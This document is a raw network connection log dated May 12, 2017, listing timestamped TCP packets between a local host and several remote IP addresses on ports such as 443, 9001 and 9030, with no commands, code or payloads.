May 12, 2017 18:54:28.190756083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190856934 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190871954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.190900087 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.190920115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.192555904 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.199165106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199188948 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199218988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.199325085 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.199878931 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.212642908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213386059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213537931 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213567972 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213579893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213645935 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213766098 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213783026 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213793993 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.213839054 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.213891983 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.222851992 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222867012 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222887039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.222938061 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.239032030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239048958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239058018 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.239120007 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.248209953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248226881 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248234034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.248311996 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.248653889 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.288450003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305226088 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305248022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.305272102 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.306330919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.308501005 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.309952974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.309977055 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310105085 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.310127974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310722113 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310744047 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.310909986 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.310930967 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312273979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312289953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312391043 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.312408924 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.312747002 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.312772989 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313357115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313371897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313693047 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.313719034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313946962 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.313954115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314090014 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314116001 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314140081 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314152956 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314234018 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314259052 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314352036 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314364910 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.314505100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.314528942 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.323786974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.323803902 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.324124098 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.324158907 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.329955101 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.329971075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.330542088 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.330558062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333030939 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333045959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.333108902 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.333126068 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.341787100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342051029 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342936039 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.342955112 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347162008 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347181082 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347193003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.347428083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.348656893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348679066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348690987 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.348819971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.349662066 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.356894016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.356920004 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.356935978 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357012987 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.357798100 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357820988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.357950926 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.357994080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367095947 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367125034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.367228031 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.367250919 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376270056 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376300097 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376354933 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.376374006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.376521111 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.380218029 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.380240917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.380312920 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.388513088 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388533115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388547897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.388618946 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.389483929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389507055 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389522076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.389606953 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.390212059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.397116899 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397154093 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397177935 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.397269011 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.398653984 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398680925 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398696899 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.398768902 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.399616003 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399640083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399652958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.399799109 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.407882929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.407911062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.407936096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.408019066 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.408998966 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409023046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409039974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.409110069 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.413985968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414017916 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414031982 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.414177895 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.417877913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.417898893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.417915106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418039083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.418437958 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.418591976 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418612957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418625116 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.418706894 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.426814079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.426842928 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.426860094 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.427037954 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.428188086 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428203106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428210020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.428288937 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.435100079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435122967 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435138941 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.435204029 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.437499046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437515020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437524080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.437618971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.439769983 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439786911 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439796925 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.439891100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.440743923 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.446753979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446784973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446801901 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.446901083 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.450074911 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450098991 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450110912 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.450196028 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.451677084 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451697111 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451710939 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.451786995 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.456357002 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456378937 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456389904 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.456521034 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461031914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461055040 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461067915 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461157084 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461165905 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461188078 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461205959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461283922 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.461293936 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461308956 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.461388111 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.462997913 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.465523005 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.471946955 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.471967936 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.472115040 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.472147942 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476092100 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476114988 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.476238012 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.476273060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479476929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479491949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.479574919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.479604006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484668970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484694958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484793901 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484798908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.484808922 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484822989 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484841108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.484941959 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.488789082 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488815069 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488835096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.488941908 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.503079891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503119946 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503154039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503278971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.503823996 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.503876925 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.540452957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559111118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559133053 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.559199095 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.559216022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.582871914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.582972050 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.582992077 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593415022 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593442917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.593512058 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.593533993 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.602926016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.602956057 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.603048086 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.603070021 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.812474966 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.812650919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.766637087 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.766689062 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:36.766911983 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.766935110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.767024040 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.767398119 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:36.767416000 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:36.933973074 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.933999062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.934073925 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.943279028 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943296909 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943309069 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.943366051 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.976470947 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976519108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976541996 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976604939 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:36.976674080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:36.976696968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:52.203018904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203023911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203030109 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203035116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203039885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.203747034 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.203938007 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.208044052 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.208075047 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208086014 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208120108 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.208251953 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.244453907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.244584084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.244606972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.371630907 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:52.420449972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.572491884 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:52.572593927 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:52.636455059 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.636744022 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.658694029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:52.658719063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:52.658848047 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:53.068454981 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:53.068562031 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.667990923 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.668030977 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668047905 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668056011 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668073893 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668081999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668095112 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668102026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668112993 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668119907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668131113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668278933 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.668304920 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668318987 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668332100 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668344021 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668354988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668365955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668378115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668389082 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668396950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668406010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668411970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668420076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668426037 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668441057 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668453932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668458939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668462992 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668471098 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668478012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.668487072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670233011 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670258999 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670377970 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.670397997 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670408964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670420885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670434952 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670447111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670460939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670466900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670475006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670480967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670506001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670531988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670547009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.670572996 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670586109 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670663118 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.670675039 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.670766115 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:54.670778990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:54.670874119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.671247005 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671267033 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.671408892 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671423912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.671498060 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.671509027 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.672553062 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.672569990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.672910929 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.672935009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.673059940 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.673074007 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.673131943 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.673142910 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677244902 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677262068 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677361012 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677373886 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.677434921 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.677444935 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678097963 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.678117990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.678400993 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678416014 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678513050 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678524971 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.678585052 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.678596020 CEST909049200138.68.0.4192.168.1.16
